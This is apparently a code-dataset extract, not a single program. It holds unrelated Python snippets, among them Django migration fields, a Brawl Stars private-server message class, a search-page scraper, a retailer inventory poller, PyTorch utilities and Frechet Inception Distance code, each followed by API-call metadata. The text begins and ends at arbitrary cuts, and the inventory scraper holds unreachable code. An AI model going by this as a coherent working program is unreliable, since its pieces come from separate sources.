"(null=True, verbose_name='Hours per Week')\n", (3440, 3482), False, 'from django.db import migrations, models\n'), ((3624, 3691), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)', 'verbose_name': '"""Current Position?"""'}), "(default=True, verbose_name='Current Position?')\n", (3643, 3691), False, 'from django.db import migrations, models\n'), ((3822, 3940), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""jobHistory.Position"""', 'verbose_name': '"""Position"""'}), "(on_delete=django.db.models.deletion.CASCADE, to=\n 'jobHistory.Position', verbose_name='Position')\n", (3839, 3940), False, 'from django.db import migrations, models\n'), ((4067, 4136), 'django.db.models.PositiveSmallIntegerField', 'models.PositiveSmallIntegerField', ([], {'null': '(True)', 'verbose_name': '"""Start Day"""'}), "(null=True, verbose_name='Start Day')\n", (4099, 4136), False, 'from django.db import migrations, models\n'), ((4270, 4341), 'django.db.models.PositiveSmallIntegerField', 'models.PositiveSmallIntegerField', ([], {'null': '(True)', 'verbose_name': '"""Start Month"""'}), "(null=True, verbose_name='Start Month')\n", (4302, 4341), False, 'from django.db import migrations, models\n'), ((4474, 4528), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {'verbose_name': '"""Start Year"""'}), "(verbose_name='Start Year')\n", (4501, 4528), False, 'from django.db import migrations, models\n'), ((4663, 4723), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)', 'verbose_name': '"""Starting Pay"""'}), "(max_length=50, verbose_name='Starting Pay')\n", (4679, 4723), False, 'from django.db import migrations, models\n'), ((4855, 4925), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""Work City"""'}), "(blank=True, max_length=200, verbose_name='Work City')\n", (4871, 4925), False, 'from django.db import migrations, models\n'), ((5060, 5133), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""Work Country"""'}), "(blank=True, max_length=200, verbose_name='Work Country')\n", (5076, 5133), False, 'from django.db import migrations, models\n'), ((5277, 5364), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""Work County or Parish"""'}), "(blank=True, max_length=200, verbose_name=\n 'Work County or Parish')\n", (5293, 5364), False, 'from django.db import migrations, models\n'), ((5504, 5592), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""Work State or Province"""'}), "(blank=True, max_length=200, verbose_name=\n 'Work State or Province')\n", (5520, 5592), False, 'from django.db import migrations, models\n'), ((5733, 5826), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(50)', 'verbose_name': '"""Work Zip Code or Postal Code"""'}), "(blank=True, max_length=50, verbose_name=\n 'Work Zip Code or Postal Code')\n", (5749, 5826), False, 'from django.db import migrations, models\n'), ((5950, 5998), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'verbose_name': '"""Can Contact?"""'}), "(verbose_name='Can Contact?')\n", (5969, 5998), False, 'from django.db import migrations, models\n'), ((6149, 6227), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'verbose_name': '"""Contributions and Accomplishments"""'}), "(blank=True, verbose_name='Contributions and Accomplishments')\n", (6165, 6227), False, 'from django.db import migrations, models\n'), ((6353, 6471), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""jobHistory.Employer"""', 'verbose_name': '"""Employer"""'}), "(on_delete=django.db.models.deletion.CASCADE, to=\n 'jobHistory.Employer', verbose_name='Employer')\n", (6370, 6471), False, 'from django.db import migrations, models\n'), ((6600, 6661), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'verbose_name': '"""Responsibilities"""'}), "(blank=True, verbose_name='Responsibilities')\n", (6616, 6661), False, 'from django.db import migrations, models\n'), ((6794, 6870), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""Supervisor City"""'}), "(blank=True, max_length=200, verbose_name='Supervisor City')\n", (6810, 6870), False, 'from django.db import migrations, models\n'), ((7006, 7085), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""Supervisor Country"""'}), "(blank=True, max_length=200, verbose_name='Supervisor Country')\n", (7022, 7085), False, 'from django.db import migrations, models\n'), ((7230, 7323), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""Supervisor County or Parish"""'}), "(blank=True, max_length=200, verbose_name=\n 'Supervisor County or Parish')\n", (7246, 7323), False, 'from django.db import migrations, models\n'), ((7452, 7530), 'django.db.models.EmailField', 'models.EmailField', ([], {'blank': '(True)', 'max_length': '(254)', 'verbose_name': '"""Supervisor Email"""'}), "(blank=True, max_length=254, verbose_name='Supervisor Email')\n", (7469, 7530), False, 'from django.db import migrations, models\n'), ((7669, 7739), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)', 'verbose_name': '"""Supervisor Given Name"""'}), "(max_length=200, verbose_name='Supervisor Given Name')\n", (7685, 7739), False, 'from django.db import migrations, models\n'), ((7879, 7967), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""Supervisor Middle Name"""'}), "(blank=True, max_length=200, verbose_name=\n 'Supervisor Middle Name')\n", (7895, 7967), False, 'from django.db import migrations, models\n'), ((8102, 8189), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(50)', 'verbose_name': '"""Supervisor Name Prefix"""'}), "(blank=True, max_length=50, verbose_name=\n 'Supervisor Name Prefix')\n", (8118, 8189), False, 'from django.db import migrations, models\n'), ((8324, 8411), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(50)', 'verbose_name': '"""Supervisor Name Suffix"""'}), "(blank=True, max_length=50, verbose_name=\n 'Supervisor Name Suffix')\n", (8340, 8411), False, 'from django.db import migrations, models\n'), ((8540, 8616), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(50)', 'verbose_name': '"""Supervisor Phone"""'}), "(blank=True, max_length=50, verbose_name='Supervisor Phone')\n", (8556, 8616), False, 'from django.db import migrations, models\n'), ((8762, 8856), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""Supervisor State or Province"""'}), "(blank=True, max_length=200, verbose_name=\n 'Supervisor State or Province')\n", (8778, 8856), False, 'from django.db import migrations, models\n'), ((8987, 9054), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)', 'verbose_name': '"""Supervisor Surname"""'}), "(max_length=200, verbose_name='Supervisor Surname')\n", (9003, 9054), False, 'from django.db import migrations, models\n'), ((9201, 9300), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(50)', 'verbose_name': '"""Supervisor Zip Code or Postal Code"""'}), "(blank=True, max_length=50, verbose_name=\n 'Supervisor Zip Code or Postal Code')\n", (9217, 9300), False, 'from django.db import migrations, models\n'), ((9418, 9472), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)', 'verbose_name': '"""Title"""'}), "(max_length=200, verbose_name='Title')\n", (9434, 9472), False, 'from django.db import migrations, models\n')] |
from Logic.Data.DataManager import Writer
from Logic.Client.ClientsManager import ClientsManager
class LobbyInfoMessage(Writer):
def __init__(self, client, player):
super().__init__(client)
self.id = 23457
self.client = client
self.player = player
def encode(self):
self.writeVint(ClientsManager.GetCount())
self.writeString("Brawl Stars\n"f"Version: {self.player.device.major}.{self.player.device.build}.{self.player.device.minor}")
self.writeVint(0)
| [
"Logic.Client.ClientsManager.ClientsManager.GetCount"
] | [((331, 356), 'Logic.Client.ClientsManager.ClientsManager.GetCount', 'ClientsManager.GetCount', ([], {}), '()\n', (354, 356), False, 'from Logic.Client.ClientsManager import ClientsManager\n')] |
from bs4 import BeautifulSoup
import requests
text = input("text : ")
text.replace(" ", "+")
params = {"q": text}
content = requests.get("https://duckduckgo.com/?q=", params=params)
soup = BeautifulSoup(content.text, 'html.parser')
res = soup.find_all('div', class_="result__snippet js-result-snippet")
for r in res:
print(r)
| [
"bs4.BeautifulSoup",
"requests.get"
] | [((126, 183), 'requests.get', 'requests.get', (['"""https://duckduckgo.com/?q="""'], {'params': 'params'}), "('https://duckduckgo.com/?q=', params=params)\n", (138, 183), False, 'import requests\n'), ((191, 233), 'bs4.BeautifulSoup', 'BeautifulSoup', (['content.text', '"""html.parser"""'], {}), "(content.text, 'html.parser')\n", (204, 233), False, 'from bs4 import BeautifulSoup\n')] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.http import Http404
from infinite_scroll_pagination.paginator import SeekPaginator, EmptyPage
def paginate(request, query_set, lookup_field, per_page=15, page_var='value'):
# TODO: remove
page_pk = request.GET.get(page_var, None)
paginator = SeekPaginator(query_set, per_page=per_page, lookup_field=lookup_field)
# First page
if page_pk is None:
return paginator.page()
try:
obj = query_set.model.objects.get(pk=page_pk)
except query_set.model.DoesNotExist:
raise Http404()
value = getattr(obj, lookup_field)
try:
page = paginator.page(value=value, pk=page_pk)
except EmptyPage:
raise Http404()
return page
| [
"infinite_scroll_pagination.paginator.SeekPaginator",
"django.http.Http404"
] | [((335, 405), 'infinite_scroll_pagination.paginator.SeekPaginator', 'SeekPaginator', (['query_set'], {'per_page': 'per_page', 'lookup_field': 'lookup_field'}), '(query_set, per_page=per_page, lookup_field=lookup_field)\n', (348, 405), False, 'from infinite_scroll_pagination.paginator import SeekPaginator, EmptyPage\n'), ((599, 608), 'django.http.Http404', 'Http404', ([], {}), '()\n', (606, 608), False, 'from django.http import Http404\n'), ((750, 759), 'django.http.Http404', 'Http404', ([], {}), '()\n', (757, 759), False, 'from django.http import Http404\n')] |
import traceback
from pycompss.api.task import task
from pycompss.api.constraint import constraint
from pycompss.api.parameter import FILE_IN, FILE_OUT
from biobb_common.tools import file_utils as fu
from biobb_md.gromacs_extra import append_ligand
import os
import sys
@constraint(computingUnits="1")
@task(input_top_zip_path=FILE_IN, input_itp_path=FILE_IN,
output_top_zip_path=FILE_OUT, input_posres_itp_path=FILE_IN,
on_failure="IGNORE")
def append_ligand_pc(input_top_zip_path, input_itp_path,
output_top_zip_path, input_posres_itp_path,
properties, **kwargs):
try:
os.environ.pop('PMI_FD', None)
os.environ.pop('PMI_JOBID', None)
os.environ.pop('PMI_RANK', None)
os.environ.pop('PMI_SIZE', None)
append_ligand.AppendLigand(input_top_zip_path=input_top_zip_path, input_itp_path=input_itp_path,
output_top_zip_path=output_top_zip_path, input_posres_itp_path=input_posres_itp_path,
properties=properties, **kwargs).launch()
except Exception:
traceback.print_exc()
fu.write_failed_output(output_top_zip_path)
finally:
sys.stdout.flush()
sys.stderr.flush() | [
"biobb_common.tools.file_utils.write_failed_output",
"pycompss.api.constraint.constraint",
"sys.stderr.flush",
"os.environ.pop",
"biobb_md.gromacs_extra.append_ligand.AppendLigand",
"pycompss.api.task.task",
"sys.stdout.flush",
"traceback.print_exc"
] | [((272, 302), 'pycompss.api.constraint.constraint', 'constraint', ([], {'computingUnits': '"""1"""'}), "(computingUnits='1')\n", (282, 302), False, 'from pycompss.api.constraint import constraint\n'), ((304, 451), 'pycompss.api.task.task', 'task', ([], {'input_top_zip_path': 'FILE_IN', 'input_itp_path': 'FILE_IN', 'output_top_zip_path': 'FILE_OUT', 'input_posres_itp_path': 'FILE_IN', 'on_failure': '"""IGNORE"""'}), "(input_top_zip_path=FILE_IN, input_itp_path=FILE_IN,\n output_top_zip_path=FILE_OUT, input_posres_itp_path=FILE_IN, on_failure\n ='IGNORE')\n", (308, 451), False, 'from pycompss.api.task import task\n'), ((638, 668), 'os.environ.pop', 'os.environ.pop', (['"""PMI_FD"""', 'None'], {}), "('PMI_FD', None)\n", (652, 668), False, 'import os\n'), ((677, 710), 'os.environ.pop', 'os.environ.pop', (['"""PMI_JOBID"""', 'None'], {}), "('PMI_JOBID', None)\n", (691, 710), False, 'import os\n'), ((719, 751), 'os.environ.pop', 'os.environ.pop', (['"""PMI_RANK"""', 'None'], {}), "('PMI_RANK', None)\n", (733, 751), False, 'import os\n'), ((760, 792), 'os.environ.pop', 'os.environ.pop', (['"""PMI_SIZE"""', 'None'], {}), "('PMI_SIZE', None)\n", (774, 792), False, 'import os\n'), ((1221, 1239), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (1237, 1239), False, 'import sys\n'), ((1248, 1266), 'sys.stderr.flush', 'sys.stderr.flush', ([], {}), '()\n', (1264, 1266), False, 'import sys\n'), ((1126, 1147), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (1145, 1147), False, 'import traceback\n'), ((1156, 1199), 'biobb_common.tools.file_utils.write_failed_output', 'fu.write_failed_output', (['output_top_zip_path'], {}), '(output_top_zip_path)\n', (1178, 1199), True, 'from biobb_common.tools import file_utils as fu\n'), ((801, 1029), 'biobb_md.gromacs_extra.append_ligand.AppendLigand', 'append_ligand.AppendLigand', ([], {'input_top_zip_path': 'input_top_zip_path', 'input_itp_path': 'input_itp_path', 'output_top_zip_path': 'output_top_zip_path', 'input_posres_itp_path': 'input_posres_itp_path', 'properties': 'properties'}), '(input_top_zip_path=input_top_zip_path,\n input_itp_path=input_itp_path, output_top_zip_path=output_top_zip_path,\n input_posres_itp_path=input_posres_itp_path, properties=properties, **\n kwargs)\n', (827, 1029), False, 'from biobb_md.gromacs_extra import append_ligand\n')] |
import requests
import json
from pprint import pprint
import re
import time
import sys
#getdata = requests.get(geturl)
#pprint (vars(getdata))
from bs4 import BeautifulSoup
from geopy.geocoders import Nominatim
if len(sys.argv) != 4:
print(sys.argv[0]+" <item> <location> <num items>")
exit()
#get list of product IDs
item = sys.argv[1].replace(" ","+")
print("searching for items with: "+item)
geturl = "http://www.cvs.com/search/N-0?searchTerm="+item+"&navNum="+sys.argv[3]
print("search url: "+geturl)
#This step is important.Converting QString to Ascii for lxml to process
#archive_links = html.fromstring(str(result.toAscii()))
#print archive_links
response = requests.get(geturl)
print(str(response))
page = str(BeautifulSoup(response.content,"html.parser"))
print(page)
exit()
def getURL(page):
start_link = page.find("href")
if start_link == -1:
return None, 0
start_quote = page.find('"', start_link)
end_quote = page.find('"', start_quote + 1)
url = page[start_quote + 1: end_quote]
return url, end_quote
def getUrls(urls,page):
url, n = getURL(page)
if url:
urls.append(url)
getUrls(urls,page[n:])
urls = []
getUrls(urls,page)
for url in urls:
print(url)
itemlist = []
skuidlist = []
for i in range(0,len(urls)):
m = re.search('/shop/.*/.*/.*/(.*)-skuid-(\d{6})',urls[i])
if m and m.group(2) not in skuidlist:
itemlist.append(m.group(1))
skuidlist.append(m.group(2))
print("items found:")
for item in itemlist:
print("\t"+item)
#TODO: now the page loads these in js, so we need to interpret js
exit()
geolocator = Nominatim()
location = geolocator.geocode(sys.argv[2])
print((location.latitude,location.longitude))
posturl = "http://www.cvs.com/rest/bean/cvs/catalog/CvsBohServiceHandler/storeInventoryValues"
dicts = []
print('loading initial inventory...')
for i in range(0,len(skuidlist)):
time.sleep(2)
productId = skuidlist[i]
postdata = {'productId': productId, 'productSPUlnd': 'true','favstore':'NULL','geolatitude':str(location.latitude),'geolongitude':str(location.longitude)}
inv = requests.post(posturl,data=postdata)
dict = {}
jsons = inv.json()['atgResponse']
for j in range(0,len(jsons)):
temp = jsons[j]
if(temp['Qty'] == ''):
temp['Qty'] = '0'
dict[temp['storeAddress']] = temp['Qty']
dicts.append(dict)
print(str(100*i/len(skuidlist))+"%")
while True:
for j in range(0,len(skuidlist)):
#delay between requests
print('3 seconds...')
time.sleep(3)
productId = skuidlist[j]
postdata = {'productId': productId, 'productSPUlnd': 'true','favstore':'NULL','geolatitude':str(location.latitude),'geolongitude':str(location.longitude)}
inv = requests.post(posturl,data=postdata)
jsons = inv.json()['atgResponse']
for i in range(0,len(jsons)):
temp = jsons[i]
if(temp['Qty'] == ''):
temp['Qty'] = '0'
if(dicts[j][temp['storeAddress']] != temp['Qty']):
print("was: "+dicts[j][temp['storeAddress']]+" now: "+temp['Qty'])
sold = int(dicts[j][temp['storeAddress']]) - int(temp['Qty'])
print(temp['storeAddress']+" sold "+str(sold) + " of item " +itemlist[j])
dicts[j][temp['storeAddress']] = temp['Qty']
| [
"requests.post",
"geopy.geocoders.Nominatim",
"time.sleep",
"requests.get",
"bs4.BeautifulSoup",
"re.search"
] | [((677, 697), 'requests.get', 'requests.get', (['geturl'], {}), '(geturl)\n', (689, 697), False, 'import requests\n'), ((1625, 1636), 'geopy.geocoders.Nominatim', 'Nominatim', ([], {}), '()\n', (1634, 1636), False, 'from geopy.geocoders import Nominatim\n'), ((731, 777), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.content', '"""html.parser"""'], {}), "(response.content, 'html.parser')\n", (744, 777), False, 'from bs4 import BeautifulSoup\n'), ((1310, 1366), 're.search', 're.search', (['"""/shop/.*/.*/.*/(.*)-skuid-(\\\\d{6})"""', 'urls[i]'], {}), "('/shop/.*/.*/.*/(.*)-skuid-(\\\\d{6})', urls[i])\n", (1319, 1366), False, 'import re\n'), ((1912, 1925), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (1922, 1925), False, 'import time\n'), ((2124, 2161), 'requests.post', 'requests.post', (['posturl'], {'data': 'postdata'}), '(posturl, data=postdata)\n', (2137, 2161), False, 'import requests\n'), ((2542, 2555), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (2552, 2555), False, 'import time\n'), ((2757, 2794), 'requests.post', 'requests.post', (['posturl'], {'data': 'postdata'}), '(posturl, data=postdata)\n', (2770, 2794), False, 'import requests\n')] |
from __future__ import print_function
import numpy as np
from copy import copy
import torch
import torch.nn.functional as F
from torch.autograd import Variable
import torch.nn as nn
def apply_var(v, k):
if isinstance(v, Variable) and v.requires_grad:
v.register_hook(inves(k))
def apply_dict(dic):
for k, v in dic.iteritems():
apply_var(v, k)
if isinstance(v, nn.Module):
key_list = [a for a in dir(v) if not a.startswith('__')]
for key in key_list:
apply_var(getattr(v, key), key)
for pk, pv in v._parameters.iteritems():
apply_var(pv, pk)
def inves(name=''):
def f(tensor):
if np.isnan(torch.mean(tensor).data.cpu().numpy()):
print('\ngradient of {} :'.format(name))
print(tensor)
assert 0, 'nan gradient'
return tensor
return f
def reduce_sum(inputs, dim=None, keep_dim=False):
if dim is None:
return torch.sum(inputs)
output = torch.sum(inputs, dim)
if not keep_dim:
return output
else:
return expand_dims(output, dim)
def pairwise_add(u, v=None, is_batch=False):
"""
performs a pairwise summation between vectors (possibly the same)
can also be performed on batch of vectors.
Parameters:
----------
u, v: Tensor (m,) or (b,m)
Returns:
---------
Tensor (m, n) or (b, m, n)
"""
u_shape = u.size()
if v is None:
v = u
v_shape = v.size()
if len(u_shape) > 2 and not is_batch:
raise ValueError("Expected at most 2D tensor or 3D tensor with batch")
if len(v_shape) > 2 and not is_batch:
raise ValueError("Expected at most 2D tensor or 3D tensor with batch")
m = u_shape[0] if not is_batch else u_shape[1]
n = v_shape[0] if not is_batch else v_shape[1]
u = expand_dims(u, axis=-1)
new_u_shape = list(u.size())
new_u_shape[-1] = n
U_ = u.expand(*new_u_shape)
v = expand_dims(v, axis=-2)
new_v_shape = list(v.size())
new_v_shape[-2] = m
V_ = v.expand(*new_v_shape)
return U_ + V_
def to_device(src, ref):
return src.cuda(ref.get_device()) if ref.is_cuda else src
def cumprod(inputs, dim=1, exclusive=True):
# https://github.com/tensorflow/tensorflow/blob/master/tensorflow/g3doc/api_docs/python/functions_and_classes/shard0/tf.cumprod.md
if type(inputs) is not Variable:
temp = torch.cumprod(inputs, dim)
if not exclusive:
return temp
else:
temp = temp / (inputs[0].expand_as(temp) + 1e-8)
temp[-1] = temp[-1] / (inputs[-1] + 1e-8)
return temp
else:
shape_ = inputs.size()
ndim = len(shape_)
n_slot = shape_[dim]
slice_ = [slice(0, None, 1) for _ in range(ndim)]
results = [[]] * n_slot
for ind in range(0, n_slot):
this_slice, last_slice = copy(slice_), copy(slice_)
this_slice[dim] = ind
last_slice[dim] = ind - 1
this_slice = tuple(this_slice)
last_slice = tuple(last_slice)
if exclusive:
if ind > 0:
results[ind] = results[ind - 1] * inputs[last_slice]
else:
results[ind] = torch.div(
inputs[this_slice], inputs[this_slice] + 1e-8)
else:
if ind > 0:
results[ind] = results[ind - 1] * inputs[this_slice]
else:
results[ind] = inputs[this_slice]
return torch.stack(results, dim)
def expand_dims(input, axis=0):
input_shape = list(input.size())
if axis < 0:
axis = len(input_shape) + axis + 1
input_shape.insert(axis, 1)
return input.view(*input_shape)
def matmal(left, right):
'''
left is of size (*N, n1,n2), where N is a list
right is of size(*M, m1,m2), where M is a list
output is of size
'''
pass
def cosine_distance(memory_matrix, cos_keys):
"""
compute the cosine similarity between keys to each of the
memory slot.
Parameters:
----------
memory_matrix: Tensor (batch_size, mem_slot, mem_size)
the memory matrix to lookup in
keys: Tensor (batch_size, mem_size, number_of_keys)
the keys to query the memory with
strengths: Tensor (batch_size, number_of_keys, )
the list of strengths for each lookup key
Returns: Tensor (batch_size, mem_slot, number_of_keys)
The list of lookup weightings for each provided key
"""
memory_norm = torch.norm(memory_matrix, 2, 2, keepdim=True)
keys_norm = torch.norm(cos_keys, 2, 1, keepdim=True)
normalized_mem = torch.div(
memory_matrix, memory_norm.expand_as(memory_matrix) + 1e-8)
normalized_keys = torch.div(cos_keys, keys_norm.expand_as(cos_keys) + 1e-8)
out = torch.bmm(normalized_mem, normalized_keys)
# print(normalized_keys)
# print(out)
# apply_dict(locals())
return out
def softmax(input, axis=1):
"""
Apply softmax on input at certain axis.
Parammeters:
----------
input: Tensor (N*L or rank>2)
axis: the axis to apply softmax
Returns: Tensor with softmax applied on that dimension.
"""
input_size = input.size()
trans_input = input.transpose(axis, len(input_size) - 1)
trans_size = trans_input.size()
input_2d = trans_input.contiguous().view(-1, trans_size[-1])
soft_max_2d = F.softmax(input_2d)
soft_max_nd = soft_max_2d.view(*trans_size)
# apply_dict(locals())
return soft_max_nd.transpose(axis, len(input_size) - 1)
| [
"torch.mean",
"torch.stack",
"torch.cumprod",
"torch.norm",
"torch.sum",
"torch.div",
"torch.bmm",
"copy.copy",
"torch.nn.functional.softmax"
] | [((1019, 1041), 'torch.sum', 'torch.sum', (['inputs', 'dim'], {}), '(inputs, dim)\n', (1028, 1041), False, 'import torch\n'), ((4617, 4662), 'torch.norm', 'torch.norm', (['memory_matrix', '(2)', '(2)'], {'keepdim': '(True)'}), '(memory_matrix, 2, 2, keepdim=True)\n', (4627, 4662), False, 'import torch\n'), ((4679, 4719), 'torch.norm', 'torch.norm', (['cos_keys', '(2)', '(1)'], {'keepdim': '(True)'}), '(cos_keys, 2, 1, keepdim=True)\n', (4689, 4719), False, 'import torch\n'), ((4912, 4954), 'torch.bmm', 'torch.bmm', (['normalized_mem', 'normalized_keys'], {}), '(normalized_mem, normalized_keys)\n', (4921, 4954), False, 'import torch\n'), ((5514, 5533), 'torch.nn.functional.softmax', 'F.softmax', (['input_2d'], {}), '(input_2d)\n', (5523, 5533), True, 'import torch.nn.functional as F\n'), ((988, 1005), 'torch.sum', 'torch.sum', (['inputs'], {}), '(inputs)\n', (997, 1005), False, 'import torch\n'), ((2449, 2475), 'torch.cumprod', 'torch.cumprod', (['inputs', 'dim'], {}), '(inputs, dim)\n', (2462, 2475), False, 'import torch\n'), ((3603, 3628), 'torch.stack', 'torch.stack', (['results', 'dim'], {}), '(results, dim)\n', (3614, 3628), False, 'import torch\n'), ((2941, 2953), 'copy.copy', 'copy', (['slice_'], {}), '(slice_)\n', (2945, 2953), False, 'from copy import copy\n'), ((2955, 2967), 'copy.copy', 'copy', (['slice_'], {}), '(slice_)\n', (2959, 2967), False, 'from copy import copy\n'), ((3310, 3367), 'torch.div', 'torch.div', (['inputs[this_slice]', '(inputs[this_slice] + 1e-08)'], {}), '(inputs[this_slice], inputs[this_slice] + 1e-08)\n', (3319, 3367), False, 'import torch\n'), ((706, 724), 'torch.mean', 'torch.mean', (['tensor'], {}), '(tensor)\n', (716, 724), False, 'import torch\n')] |
# Code apapted from https://github.com/mseitzer/pytorch-fid
"""Calculates the Frechet Inception Distance (FID) to evalulate GANs
The FID metric calculates the distance between two distributions of images.
Typically, we have summary statistics (mean & covariance matrix) of one
of these distributions, while the 2nd distribution is given by a GAN.
When run as a stand-alone program, it compares the distribution of
images that are stored as PNG/JPEG at a specified location with a
distribution given by summary statistics (in pickle format).
The FID is calculated by assuming that X_1 and X_2 are the activations of
the pool_3 layer of the inception net for generated samples and real world
samples respectively.
See --help to see further details.
Code apapted from https://github.com/bioinf-jku/TTUR to use PyTorch instead
of Tensorflow
Copyright 2018 Institute of Bioinformatics, JKU Linz
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import time
import numpy as np
import torch
from scipy import linalg
from torch.nn.functional import adaptive_avg_pool2d
from util import tools
def get_activations(dataset, model, size=1000, batch_size=50, dims=2048, device='cpu'):
"""Calculates the activations of the pool_3 layer for all images.
Params:
-- files : List of image files paths
-- model : Instance of inception model
-- batch_size : Batch size of images for the model to process at once.
Make sure that the number of samples is a multiple of
the batch size, otherwise some samples are ignored. This
behavior is retained to match the original FID score
implementation.
-- dims : Dimensionality of features returned by Inception
-- device : Device to run calculations
Returns:
-- A numpy array of dimension (num images, dims) that contains the
activations of the given tensor when feeding inception with the
query tensor.
"""
model.eval()
if batch_size > size:
print(('Warning: batch size is bigger than the data size. '
'Setting batch size to data size'))
batch_size = size
dataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=False, drop_last=False)
pred_arr = np.empty((size, dims))
start_idx = 0
for batch, _ in dataloader:
if batch.shape[1] == 1:
batch = torch.cat((batch, batch, batch), 1)
batch = batch.to(device)
with torch.no_grad():
pred = model(batch)[0]
# If model output is not scalar, apply global spatial average pooling.
# This happens if you choose a dimensionality not equal 2048.
if pred.size(2) != 1 or pred.size(3) != 1:
pred = adaptive_avg_pool2d(pred, output_size=(1, 1))
pred = pred.squeeze(3).squeeze(2).cpu().numpy()
pred_arr[start_idx:start_idx + pred.shape[0]] = pred
start_idx = start_idx + pred.shape[0]
if start_idx >= size:
break
return pred_arr
def calculate_frechet_distance(mu1, sigma1, mu2, sigma2, eps=1e-6):
"""Numpy implementation of the Frechet Distance.
The Frechet distance between two multivariate Gaussians X_1 ~ N(mu_1, C_1)
and X_2 ~ N(mu_2, C_2) is
d^2 = ||mu_1 - mu_2||^2 + Tr(C_1 + C_2 - 2*sqrt(C_1*C_2)).
Stable version by <NAME>.
Params:
-- mu1 : Numpy array containing the activations of a layer of the
inception net (like returned by the function 'get_predictions')
for generated samples.
-- mu2 : The sample mean over activations, precalculated on an
representative data set.
-- sigma1: The covariance matrix over activations for generated samples.
-- sigma2: The covariance matrix over activations, precalculated on an
representative data set.
Returns:
-- : The Frechet Distance.
"""
mu1 = np.atleast_1d(mu1)
mu2 = np.atleast_1d(mu2)
sigma1 = np.atleast_2d(sigma1)
sigma2 = np.atleast_2d(sigma2)
assert mu1.shape == mu2.shape, 'Training and test mean vectors have different lengths'
assert sigma1.shape == sigma2.shape, 'Training and test covariances have different dimensions'
diff = mu1 - mu2
# Product might be almost singular
start_time = time.time()
covmean, _ = linalg.sqrtm(sigma1.dot(sigma2), disp=False)
print("FID: sqrtm --- %s seconds ---" % (time.time() - start_time))
if not np.isfinite(covmean).all():
msg = ('fid calculation produces singular product; '
'adding %s to diagonal of cov estimates') % eps
print(msg)
offset = np.eye(sigma1.shape[0]) * eps
covmean = linalg.sqrtm((sigma1 + offset).dot(sigma2 + offset))
# Numerical error might give slight imaginary component
if np.iscomplexobj(covmean):
if not np.allclose(np.diagonal(covmean).imag, 0, atol=1e-3):
m = np.max(np.abs(covmean.imag))
# raise ValueError('Imaginary component {}'.format(m))
print('Imaginary component {}'.format(m))
covmean = covmean.real
tr_covmean = np.trace(covmean)
return diff.dot(diff) + np.trace(sigma1) + np.trace(sigma2) - 2 * tr_covmean
def calculate_activation_statistics(dataset, model, size=1000, batch_size=50, dims=2048):
act = get_activations(dataset, model, size, batch_size, dims, tools.device_name())
mu = np.mean(act, axis=0)
sigma = np.cov(act, rowvar=False)
return mu, sigma
| [
"numpy.atleast_2d",
"numpy.trace",
"numpy.mean",
"torch.nn.functional.adaptive_avg_pool2d",
"numpy.eye",
"numpy.abs",
"numpy.diagonal",
"util.tools.device_name",
"numpy.iscomplexobj",
"numpy.empty",
"numpy.isfinite",
"torch.utils.data.DataLoader",
"torch.no_grad",
"numpy.cov",
